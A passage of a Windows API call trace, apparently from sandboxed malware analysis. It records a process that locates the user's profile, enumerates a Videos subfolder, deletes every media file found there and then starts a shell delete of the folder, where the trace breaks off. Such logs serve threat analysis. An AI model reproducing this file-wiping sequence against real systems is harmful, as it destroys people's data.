hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0257.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0257.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0257.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0257.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0257.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0257.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0257.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0257.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0257.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0257.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0257.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0257.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0257.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0257.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0257.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0257.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0257.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0257.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0257.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0257.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0257.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0257.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0257.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0257.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0257.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0257.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0257.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0257.343] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0257.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0257.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0257.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0257.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0257.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0257.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0257.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0257.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0257.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0257.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0257.343] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0257.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0257.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0257.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6d0 [0257.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0257.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0257.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9e8 [0257.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0257.344] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0257.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0257.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0257.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0257.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0257.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0257.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0257.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0257.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0257.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0257.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0257.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0257.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0257.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0257.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0257.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0257.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0257.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0257.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0257.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0257.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0257.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0257.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0257.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0257.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0257.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0257.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0257.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0257.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0257.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6a) returned 0x240ca38 [0257.345] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/5WsMFJk0dr95l c", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5WsMFJk0dr95l c", lpFilePart=0x8bedfc*="5WsMFJk0dr95l c") returned 0x34 [0257.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240ca38 | out: hHeap=0x25c0000) returned 1 [0257.345] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5WsMFJk0dr95l c" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\5wsmfjk0dr95l c")) returned 0x10 [0257.346] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5WsMFJk0dr95l c\\*.*", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9fefd280, ftCreationTime.dwHighDateTime=0x1d4c9cd, ftLastAccessTime.dwLowDateTime=0x5136ea10, ftLastAccessTime.dwHighDateTime=0x1d4c53c, ftLastWriteTime.dwLowDateTime=0x5136ea10, ftLastWriteTime.dwHighDateTime=0x1d4c53c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x17af, dwReserved1=0x4, cFileName=".", cAlternateFileName="")) returned 0xaa5860 [0257.346] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9fefd280, ftCreationTime.dwHighDateTime=0x1d4c9cd, ftLastAccessTime.dwLowDateTime=0x5136ea10, ftLastAccessTime.dwHighDateTime=0x1d4c53c, ftLastWriteTime.dwLowDateTime=0x5136ea10, ftLastWriteTime.dwHighDateTime=0x1d4c53c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x17af, dwReserved1=0x4, cFileName="..", cAlternateFileName="")) returned 1 [0257.346] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65a1ca0, ftCreationTime.dwHighDateTime=0x1d4d1bd, ftLastAccessTime.dwLowDateTime=0xb8a85e0, ftLastAccessTime.dwHighDateTime=0x1d4cdfb, ftLastWriteTime.dwLowDateTime=0xb8a85e0, ftLastWriteTime.dwHighDateTime=0x1d4cdfb, nFileSizeHigh=0x0, nFileSizeLow=0xac68, dwReserved0=0x17af, dwReserved1=0x4, cFileName="-k7UoPOU_BGzU4b.swf", cAlternateFileName="-K7UOP~1.SWF")) returned 1 [0257.346] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5WsMFJk0dr95l c\\-k7UoPOU_BGzU4b.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\5wsmfjk0dr95l c\\-k7uopou_bgzu4b.swf")) returned 1 [0257.347] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad09bdf0, ftCreationTime.dwHighDateTime=0x1d4cac2, ftLastAccessTime.dwLowDateTime=0x419cd9f0, ftLastAccessTime.dwHighDateTime=0x1d4d48e, ftLastWriteTime.dwLowDateTime=0x419cd9f0, ftLastWriteTime.dwHighDateTime=0x1d4d48e, nFileSizeHigh=0x0, nFileSizeLow=0x15000, dwReserved0=0x17af, dwReserved1=0x4, cFileName="5Bqx8nMAeNJE E.mkv", cAlternateFileName="5BQX8N~1.MKV")) returned 1 [0257.347] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5WsMFJk0dr95l c\\5Bqx8nMAeNJE E.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\5wsmfjk0dr95l c\\5bqx8nmaenje e.mkv")) returned 1 [0257.348] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fc7dc50, ftCreationTime.dwHighDateTime=0x1d4d2ee, ftLastAccessTime.dwLowDateTime=0xa5aa83d0, ftLastAccessTime.dwHighDateTime=0x1d4cc81, ftLastWriteTime.dwLowDateTime=0xa5aa83d0, ftLastWriteTime.dwHighDateTime=0x1d4cc81, nFileSizeHigh=0x0, nFileSizeLow=0x14f4a, dwReserved0=0x17af, dwReserved1=0x4, cFileName="GoTXKlXURN64K.mkv", cAlternateFileName="GOTXKL~1.MKV")) returned 1 [0257.348] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5WsMFJk0dr95l c\\GoTXKlXURN64K.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\5wsmfjk0dr95l c\\gotxklxurn64k.mkv")) returned 1 [0257.349] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4bdfc20, ftCreationTime.dwHighDateTime=0x1d4c8be, ftLastAccessTime.dwLowDateTime=0x4dbd56f0, ftLastAccessTime.dwHighDateTime=0x1d4cbcf, ftLastWriteTime.dwLowDateTime=0x4dbd56f0, ftLastWriteTime.dwHighDateTime=0x1d4cbcf, nFileSizeHigh=0x0, nFileSizeLow=0xaf1e, dwReserved0=0x17af, dwReserved1=0x4, cFileName="lYLG-S.mkv", cAlternateFileName="")) returned 1 [0257.349] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5WsMFJk0dr95l c\\lYLG-S.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\5wsmfjk0dr95l c\\lylg-s.mkv")) returned 1 [0257.350] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9dcbe8b0, ftCreationTime.dwHighDateTime=0x1d4cb9c, ftLastAccessTime.dwLowDateTime=0x904dc010, ftLastAccessTime.dwHighDateTime=0x1d4ce7f, ftLastWriteTime.dwLowDateTime=0x904dc010, ftLastWriteTime.dwHighDateTime=0x1d4ce7f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x17af, dwReserved1=0x4, cFileName="Oe17GB", cAlternateFileName="")) returned 1 [0257.350] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fd0d0f0, ftCreationTime.dwHighDateTime=0x1d4d19e, ftLastAccessTime.dwLowDateTime=0xea76c360, ftLastAccessTime.dwHighDateTime=0x1d4d4e8, ftLastWriteTime.dwLowDateTime=0xea76c360, ftLastWriteTime.dwHighDateTime=0x1d4d4e8, nFileSizeHigh=0x0, nFileSizeLow=0x3025, dwReserved0=0x17af, dwReserved1=0x4, cFileName="veLfI.swf", cAlternateFileName="")) returned 1 [0257.350] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5WsMFJk0dr95l c\\veLfI.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\5wsmfjk0dr95l c\\velfi.swf")) returned 1 [0257.351] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75be7960, ftCreationTime.dwHighDateTime=0x1d4c7cc, ftLastAccessTime.dwLowDateTime=0x71bef0f0, ftLastAccessTime.dwHighDateTime=0x1d4c75a, ftLastWriteTime.dwLowDateTime=0x71bef0f0, ftLastWriteTime.dwHighDateTime=0x1d4c75a, nFileSizeHigh=0x0, nFileSizeLow=0x107de, dwReserved0=0x17af, dwReserved1=0x4, cFileName="Wf9WUhx-K7.mp4", cAlternateFileName="WF9WUH~1.MP4")) returned 1 [0257.351] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5WsMFJk0dr95l c\\Wf9WUhx-K7.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\5wsmfjk0dr95l c\\wf9wuhx-k7.mp4")) returned 1 [0257.352] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43ee64b0, ftCreationTime.dwHighDateTime=0x1d4c5e0, ftLastAccessTime.dwLowDateTime=0x1fa7c7b0, ftLastAccessTime.dwHighDateTime=0x1d4c54d, ftLastWriteTime.dwLowDateTime=0x1fa7c7b0, ftLastWriteTime.dwHighDateTime=0x1d4c54d, nFileSizeHigh=0x0, nFileSizeLow=0xa7e1, dwReserved0=0x17af, dwReserved1=0x4, cFileName="Z02_NUYVf2soG76UG.mkv", cAlternateFileName="Z02_NU~1.MKV")) returned 1 [0257.352] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5WsMFJk0dr95l c\\Z02_NUYVf2soG76UG.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\5wsmfjk0dr95l c\\z02_nuyvf2sog76ug.mkv")) returned 1 [0257.353] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43ee64b0, ftCreationTime.dwHighDateTime=0x1d4c5e0, ftLastAccessTime.dwLowDateTime=0x1fa7c7b0, ftLastAccessTime.dwHighDateTime=0x1d4c54d, ftLastWriteTime.dwLowDateTime=0x1fa7c7b0, ftLastWriteTime.dwHighDateTime=0x1d4c54d, nFileSizeHigh=0x0, nFileSizeLow=0xa7e1, dwReserved0=0x17af, dwReserved1=0x4, cFileName="Z02_NUYVf2soG76UG.mkv", cAlternateFileName="Z02_NU~1.MKV")) returned 0 [0257.353] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0257.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0257.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0257.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0257.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0257.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0257.353] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0257.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0257.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0257.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0257.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0257.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0257.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0257.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0257.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0257.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0257.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0257.354] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0257.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0257.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0257.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9e8 [0257.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0257.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0257.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa30 [0257.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0257.355] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0257.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0257.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0257.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0257.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0257.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0257.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0257.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0257.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0257.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0257.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0257.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0257.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0257.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0257.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0257.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0257.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0257.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0257.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0257.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0257.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0257.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0257.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0257.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0257.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0257.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0257.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0257.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0257.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0257.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0257.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0257.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0257.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0257.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0257.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0257.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0257.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0257.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0257.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0257.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0257.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6a) returned 0x240ca38 [0257.357] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/5WsMFJk0dr95l c", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5WsMFJk0dr95l c", lpFilePart=0x8bf658*="5WsMFJk0dr95l c") returned 0x34 [0257.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240ca38 | out: hHeap=0x25c0000) returned 1 [0257.357] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5WsMFJk0dr95l c" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\5wsmfjk0dr95l c")) returned 0x10 [0257.358] SHFileOperationW (in: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5WsMFJk0dr95l c", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, 